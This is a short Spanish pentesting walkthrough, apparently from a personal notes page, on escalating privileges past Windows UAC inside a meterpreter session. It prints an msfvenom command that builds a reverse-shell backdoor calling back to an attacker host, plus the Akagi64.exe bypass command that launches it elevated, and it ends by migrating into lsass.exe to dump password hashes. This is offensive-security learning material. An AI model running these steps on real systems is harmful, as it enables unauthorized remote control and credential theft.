Supongamos que estamos dentro de una sesión de meterpreter de una máquina Windows: {{pasted_image_20230731085818.png|}} Y queremos ejecutar el comando getsystem, donde veremos que nos da error porque ha saltado el UAC: {{pasted_image_20230731085852.png|}} Por tanto, el primer paso será generar el payload con msfvenom en formato .exe, para pasárselo a la herramienta que usaremos más tarde: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.3 LPORT=4444 -f exe > 'backdoor.exe' {{pasted_image_20230731090017.png|}} Y ahora subimos este payload como también la herramienta para hacer el bypass llamada Akagi64.exe, ubicándonos en /temp porque allí tenemos permisos de escritura: {{pasted_image_20230731092903.png|}} {{pasted_image_20230731090056.png|}} Una vez hecho esto, nos pondremos otra vez en escucha con metasploit para recibir esta nueva conexión: {{pasted_image_20230731090306.png|}} Y ahora desde la otra sesión de meterpreter, ejecutamos el Akagi64.exe pasándole la backdoor.exe que hemos subido anteriormente: Akagi64.exe 23 C:\Users\admin\AppData\Local\Temp\backdoor.exe Recibimos la conexión y ahora sí podemos ejecutar el comando getsystem: {{pasted_image_20230731090426.png|}} Y también podemos migrarnos al proceso lsass.exe para dumpear hashes: {{pasted_image_20230731090942.png|}} {{pasted_image_20230731090952.png|}}